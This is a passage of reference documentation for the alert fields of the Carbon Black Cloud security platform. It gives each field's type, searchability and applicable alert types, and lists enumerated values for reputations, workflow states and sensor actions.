FACET
minimum_severity Searchable
Integer representation of severity of an Alert. Use in search criteria to limit the alerts returned to those with a severity higher than this value
Integer
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
ml_classification_anomalies List of anomalies associated with this Alert.

anomalous_field
The specific field that is exhibiting anomalous behavior; it helps identify the exact area where the anomaly has occurred. String

anomalous_field_baseline_values - The normal or expected values for the data field; this helps quantify the anomaly’s significance. [ String ]

anomaly_name
The anomaly’s name. String

anomalous_value
The actual value that was identified as an anomaly; this value contrasts with the baseline values. String
Nested Response Object:
"ml_classification_anomalies": [ 
  { 
    "anomalous_field": "actor_process_modload_count",
    "anomalous_field_baseline_values": [ "0", "1" ],
    "anomaly_name": "Process modloads",
    "anomalous_value": "65"
  },
  { 
    "anomalous_field": "actor_process_filemod_count",
    "anomalous_field_baseline_values": [ "0" ],
    "anomaly_name": "Process filemods",
    "anomalous_value": "8" 
  }
]
WATCHLIST
ml_classification_final_verdict Searchable Array
Final verdict of the alert, based on the ML models that were used to make the prediction.
String

NOT_CLASSIFIED
NOT_ANOMALOUS
ANOMALOUS
WATCHLIST FACET
ml_classification_global_prevalence Searchable Array
Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations.
String

UNKNOWN
LOW
MEDIUM
HIGH
WATCHLIST
ml_classification_org_prevalence Searchable Array
Categories (low/medium/high) used to describe the prevalence of alerts within an organization.
String

UNKNOWN
LOW
MEDIUM
HIGH
WATCHLIST
netconn_local_ip Searchable Array
IP address of the remote side of the network connection; stored as dotted decimal
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_local_ipv4 Searchable Array
IPv4 address of the local side of the network connection; stored as a dotted decimal. Only one of ipv4 and ipv6 fields will be populated.
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_local_ipv6 Searchable Array
IPv6 address of the local side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated.
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_local_port Searchable Array
TCP or UDP port used by the local side of the network connection
Integer
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_protocol Searchable Array
Network protocol of the network connection
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_remote_domain Searchable Array
Domain name (FQDN) associated with the remote end of the network connection, if available
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_remote_ip Searchable Array
IP address of the local side of the network connection; stored as dotted decimal
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_remote_ipv4 Searchable Array
IPv4 address of the remote side of the network connection; stored as dotted decimal. Only one of ipv4 and ipv6 fields will be populated.
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_remote_ipv6 Searchable Array
IPv6 address of the remote side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated.
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
netconn_remote_port Searchable Array
TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port
Integer
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM
org_key Unique alphanumeric string that identifies your organization in the Carbon Black Cloud String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_cmdline Searchable Array
Command line of the parent process
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_effective_reputation Searchable Array
Effective reputation of the parent process; applied by the sensor when the event occurred
String

ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
parent_guid Searchable Array
Unique process identifier assigned to the parent process
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_md5 Searchable Array
MD5 hash of the parent process binary
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
parent_name Searchable Array
Filesystem path of the parent process binary
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
parent_pid Searchable Array
Identifier assigned by the operating system to the parent process
Integer
parent_reputation Searchable Array
Reputation of the parent process; applied by the Carbon Black Cloud when the event is initially processed
String

ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
parent_sha256 Searchable Array
SHA-256 hash of the parent process binary
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
parent_username Searchable Array
User context in which the parent process was executed
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
policy_applied Searchable Array
Indicates whether or not a policy has been applied to any event associated with this alert
String

APPLIED
NOT_APPLIED
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
primary_event_id Searchable Array
ID of the primary event in the alert
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_cmdline Searchable Array
Command line executed by the actor process
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_effective_reputation Searchable Array
Effective reputation of the actor hash
String

ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
process_guid Searchable Array
Guid of the process that has fired the alert (optional)
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_issuer Searchable Array
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_md5 Searchable Array
MD5 hash of the actor process binary
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_name Searchable Array
Process names of an alert
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
process_pid Searchable Array
PID of the process that has fired the alert (optional)
Integer
process_publisher Searchable Array
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
process_reputation Searchable Array
Reputation of the actor process; applied when event is processed by the Carbon Black Cloud
String

ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
process_sha256 Searchable Array
SHA-256 hash of the actor process binary
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
process_username Searchable Array
User context in which the actor process was executed. MacOS - all users for the PID for fork() and exec() transitions. Linux - process user for exec() events, but in a future sensor release can be multi-valued due to setuid().
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
product_id Searchable Array
IDs of the product that identifies USB devices
String DEVICE_CONTROL
product_name Searchable Array
Names of the product that identifies USB devices
String DEVICE_CONTROL FACET
reason A spoken language written explanation of the what and why the alert occurred and any action taken, usually consisting of 1 to 3 sentences. String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
reason_code Searchable Array
A unique short-hand code or GUID identifying the particular alert reason
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
remote_is_private Searchable
Is the remote information private: true or false
Boolean
CONTAINER_RUNTIME
remote_k8s_kind Searchable Array
Kind of remote workload; set if the remote side is another workload in the same cluster
String CONTAINER_RUNTIME
remote_k8s_namespace Searchable Array
Namespace within the remote workload’s cluster; set if the remote side is another workload in the same cluster
String CONTAINER_RUNTIME
remote_k8s_pod_name Searchable Array
Remote workload pod name; set if the remote side is another workload in the same cluster
String CONTAINER_RUNTIME
remote_k8s_workload_name Searchable Array
Name of the remote workload; set if the remote side is another workload in the same cluster
String CONTAINER_RUNTIME
report_description Description of the watchlist report associated with the alert String WATCHLIST
report_id Searchable Array
Report IDs that contained the IOC that caused a hit
String WATCHLIST
report_link Searchable Array
Link of reports that contained the IOC that caused a hit
String WATCHLIST
report_name Searchable Array
Name of the watchlist report
String WATCHLIST FACET
report_tags Tags associated with the watchlist report String[]
WATCHLIST
rule_category_id Searchable Array
ID representing the category of the rule_id for certain alert types
String CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM FACET
rule_config_category Searchable Array
Types of rule configs
String reserved for future use
rule_id Searchable Array
ID of the rule that triggered an alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence, and USB Device Control alerts
String
CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM FACET
run_state Searchable Array
Whether the threat in the alert actually ran
String

DID_NOT_RUN
RAN
UNKNOWN
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
sensor_action Searchable Array
Actions taken by the sensor, according to the rules of a policy
String

ALLOW
ALLOW_AND_LOG
DENY
TERMINATE
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
serial_number Searchable Array
Serial numbers of the specific devices
String DEVICE_CONTROL
severity Searchable - use minimum_severity
Sortable

Integer representation of the impact of alert if true positive
Integer
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
tags Searchable Array
Tags added to the threat ID of the alert
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
threat_hunt_id Searchable
ID of the threat hunt being conducted in your environment by Carbon Black MDR
String WATCHLIST
threat_hunt_name Searchable
Name of the threat hunt being conducted in your environment by Carbon Black MDR. The status of a threat hunt can either being ongoing or completed
String WATCHLIST FACET
threat_id Searchable Array
ID assigned to a group of alerts with common criteria, based on alert type
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
threat_name Searchable Array
Name of the threat
String INTRUSION_DETECTION_SYSTEM
threat_notes_present Searchable
True if notes are present on the threat ID. False if notes are not present.
Boolean
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
tms_rule_id Searchable Array
Detection id
String INTRUSION_DETECTION_SYSTEM
ttps Searchable Array
Other potential malicious activities involved in a threat
String CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM
type Searchable Array
Type of alert generated
String

CB_ANALYTICS
WATCHLIST
DEVICE_CONTROL
CONTAINER_RUNTIME
HOST_BASED_FIREWALL
INTRUSION_DETECTION_SYSTEM
NETWORK_TRAFFIC_ANALYSIS
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
user_update_timestamp Searchable Time Range
Sortable
Timestamp of the last property of an alert changed by a user, such as the alert workflow or determination
ISO 8601 UTC Date String

Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
vendor_id Searchable Array
IDs of the vendors who produced the devices
String DEVICE_CONTROL
vendor_name Searchable Array
Names of the vendors who produced the devices
String DEVICE_CONTROL FACET
watchlists List of watchlists associated with an alert. Alerts are batched hourly Nested Response Object:
{
  "watchlists": [
    {
      "id": "",
      "name": ""
    }
  ]
}
WATCHLIST
watchlists_id Searchable Array
String WATCHLIST
watchlists_name Searchable Array
String WATCHLIST FACET
workflow Current workflow state of an alert. The workflow represents the flow from OPEN to IN_PROGRESS to CLOSED and captures who moved the alert into the current state. The history of these state transitions is available via the alert history route. Nested Response Object:
{
  "workflow": {
    "change_timestamp": "<string>",
    "changed_by": "<string>",
    "changed_by_type": "<string>",
    "changed_by_autoclose_rule_id": "<string>",
    "closure_reason": "<string>",
    "status": "<string>"
}
}
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
workflow_change_timestamp Searchable Time Range
Sortable
When the last status change occurred
ISO 8601 UTC Date String

Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
workflow_changed_by Who (or what) made the last status change String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
workflow_changed_by_type Searchable Array
String

SYSTEM
USER
API
AUTOMATION
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
workflow_closure_reason Searchable Array
A more detailed description of why the alert was resolved
String

NO_REASON
RESOLVED
RESOLVED_BENIGN_KNOWN_GOOD
DUPLICATE_CLEANUP
OTHER
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
workflow_status Searchable Array
primary value used to determine if the alert is active or inactive and displayed in the UI by default
String

OPEN
IN_PROGRESS
CLOSED
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET

Limitations

As with standard AND queries when searching for field_1 = X and field_2 = Y, an event with only one field populated will not be returned.


Last modified on June 6, 2024